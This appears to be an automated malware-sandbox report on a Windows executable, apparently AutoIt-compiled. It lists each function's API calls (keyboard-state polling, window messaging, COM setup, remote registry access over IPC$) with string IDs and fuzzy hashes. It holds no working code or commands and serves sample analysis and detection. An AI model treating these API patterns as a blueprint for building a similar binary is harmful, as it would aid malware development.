                        Similarity
                        • API ID: __wcsicoll$ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 3125838495-3381328864
                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                        APIs
                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                        APIs
                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                        • _wcscpy.LIBCMT ref: 004787E5
                        Strings
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 3052893215-2127371420
                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                        APIs
                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                        • __swprintf.LIBCMT ref: 0045E7F7
                        • _wprintf.LIBCMT ref: 0045E8B3
                        • _wprintf.LIBCMT ref: 0045E8D7
                        Strings
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2295938435-2354261254
                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                        APIs
                        Strings
                        Similarity
                        • API ID: __swprintf_wcscpy$__i64tow__itow
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 3038501623-2263619337
                        • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                        • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                        APIs
                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                        • __swprintf.LIBCMT ref: 0045E5F6
                        • _wprintf.LIBCMT ref: 0045E6A3
                        • _wprintf.LIBCMT ref: 0045E6C7
                        Strings
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2295938435-8599901
                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                        APIs
                        • timeGetTime.WINMM ref: 00443B67
                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                        • SetActiveWindow.USER32(00000000), ref: 00443BEC
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                        • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                        • IsWindow.USER32(00000000), ref: 00443C3A
                        • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                        Strings
                        Similarity
                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                        • String ID: BUTTON
                        • API String ID: 1834419854-3405671355
                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                        • LoadStringW.USER32(00000000), ref: 00454040
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • _wprintf.LIBCMT ref: 00454074
                        • __swprintf.LIBCMT ref: 004540A3
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                        Strings
                        Similarity
                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 455036304-4153970271
                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                        APIs
                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                        • _memmove.LIBCMT ref: 00467EB8
                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                        • _memmove.LIBCMT ref: 00467F6C
                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                        • String ID:
                        • API String ID: 2170234536-0
                        • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                        • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00453CE0
                        • SetKeyboardState.USER32(?), ref: 00453D3B
                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                        • GetKeyState.USER32(000000A0), ref: 00453D75
                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                        • GetKeyState.USER32(00000011), ref: 00453DEF
                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                        • GetKeyState.USER32(00000012), ref: 00453E26
                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                        • DeleteObject.GDI32(?), ref: 0047151E
                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                        • DeleteObject.GDI32(?), ref: 004715EA
                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                        • String ID:
                        • API String ID: 3218148540-0
                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                        • String ID:
                        • API String ID: 136442275-0
                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                        APIs
                        • _wcsncpy.LIBCMT ref: 00467490
                        • _wcsncpy.LIBCMT ref: 004674BC
                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                        • _wcstok.LIBCMT ref: 004674FF
                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                        • _wcstok.LIBCMT ref: 004675B2
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                        • _wcslen.LIBCMT ref: 00467793
                        • _wcscpy.LIBCMT ref: 00467641
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • _wcslen.LIBCMT ref: 004677BD
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                        • String ID: X
                        • API String ID: 3104067586-3081909835
                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                        APIs
                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                        • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                        • _wcslen.LIBCMT ref: 0046CDB0
                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                        Strings
                        • NULL Pointer assignment, xrefs: 0046CEA6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                        • String ID: NULL Pointer assignment
                        • API String ID: 440038798-2785691316
                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                        APIs
                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                        • _wcslen.LIBCMT ref: 004610A3
                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                        • GetWindowRect.USER32(?,?), ref: 00461248
                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                        • String ID: ThumbnailClass
                        • API String ID: 4136854206-1241985126
                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                        APIs
                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                        • GetClientRect.USER32(?,?), ref: 00471A1A
                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                        • DestroyIcon.USER32(?), ref: 00471AF4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                        • String ID: 2
                        • API String ID: 1331449709-450215437
                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                        • __swprintf.LIBCMT ref: 00460915
                        • __swprintf.LIBCMT ref: 0046092D
                        • _wprintf.LIBCMT ref: 004609E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                        • API String ID: 3054410614-2561132961
                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                        APIs
                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 600699880-22481851
                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Similarity
                        • API ID: DestroyWindow
                        • String ID: static
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                        Strings
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                        APIs
                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                        • DeleteObject.GDI32(004E0000), ref: 00470A04
                        • DestroyIcon.USER32(004A003D), ref: 00470A1C
                        • DeleteObject.GDI32(AD40D79D), ref: 00470A34
                        • DestroyWindow.USER32(00000070), ref: 00470A4C
                        • DestroyIcon.USER32(?), ref: 00470A73
                        • DestroyIcon.USER32(?), ref: 00470A81
                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                        Similarity
                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                        • String ID:
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                        • VariantInit.OLEAUT32(?), ref: 004793E1
                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                        • VariantClear.OLEAUT32(?), ref: 00479489
                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                        • VariantClear.OLEAUT32(?), ref: 004794CA
                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        APIs
                        • GetKeyboardState.USER32(?), ref: 0044480E
                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                        • GetKeyState.USER32(000000A0), ref: 004448AA
                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                        • GetKeyState.USER32(000000A1), ref: 004448D9
                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                        • GetKeyState.USER32(00000011), ref: 00444903
                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                        • GetKeyState.USER32(00000012), ref: 0044492D
                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                        • GetKeyState.USER32(0000005B), ref: 00444958
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        APIs
                        Similarity
                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                        • String ID:
                        APIs
                        Strings
                        Similarity
                        • API ID: AddressProc_free_malloc$_strcat_strlen
                        • String ID: AU3_FreeVar
                        APIs
                        • CoInitialize.OLE32 ref: 0046C63A
                        • CoUninitialize.OLE32 ref: 0046C645
                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                        • IIDFromString.OLE32(?,?), ref: 0046C705
                        Strings
                        Similarity
                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
